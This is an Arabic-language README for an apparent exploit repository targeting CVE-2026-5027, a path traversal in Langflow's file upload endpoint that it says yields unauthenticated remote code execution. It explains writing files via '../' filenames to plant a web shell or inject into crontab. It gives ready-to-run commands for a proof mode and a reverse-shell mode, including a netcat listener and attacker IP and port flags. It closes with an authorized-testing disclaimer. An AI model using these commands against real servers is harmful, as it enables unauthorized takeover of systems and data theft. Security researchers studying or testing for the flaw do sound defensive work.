
CVE-2026-5027
كتابة ملف اعتباطي إلى RCE
تنفيذ كود عن بُعد غير مصادق عليه عبر رفع الملفات
يعاني Langflow من ثغرة اجتياز المسار خطيرة في نقطة رفع الملفات (POST /api/v2/files).
يمكن للمهاجم إرسال اسم ملف خبيث يحتوي على تسلسلات ../ لـ كتابة ملفات اعتباطية في أي مكان على نظام ملفات الخادم.
يؤدي هذا بسهولة إلى تنفيذ كود عن بُعد كامل (RCE) — على سبيل المثال عن طريق إسقاط شِل ويب أو الحقن في crontab.
/tmp)python3 CVE-2026-5027.py -t http://target:7860/ --proof
المخرجات المتوقعة في حالة وجود الثغرة:
[+] Success! File written: ../../../tmp/CVE-2026-5027-proof.txt
# ابدأ المستمع
nc -lvnp 4444
# شغّل الاستغلال
python3 CVE-2026-5027.py -t http://target:7860/ --lhost YOUR_IP --lport 4444
| الملف | الوصف |
|---|---|
CVE-2026-5027.py | الاستغلال الرئيسي بلغة بايثون (إثبات المفهوم + RCE) |
CVE-2026-5027.yaml | قالب Nuclei للمسح |
README.md | هذا الملف |
وضع الإثبات
python3 CVE-2026-5027.py -t http://target.com/ --proof
وضع الشل العكسي
python3 CVE-2026-5027.py -t http://target.com/ --lhost 192.168.1.100 --lport 4444
هذا المستودع مخصص لأغراض الاختبارات الأمنية التعليمية والمرخصة فقط.
استخدمه بمسؤولية وفقط على الأنظمة التي لديك إذن صريح لاختبارها.
مصنوع بـ ❤️ لمجتمع الفريق الأحمر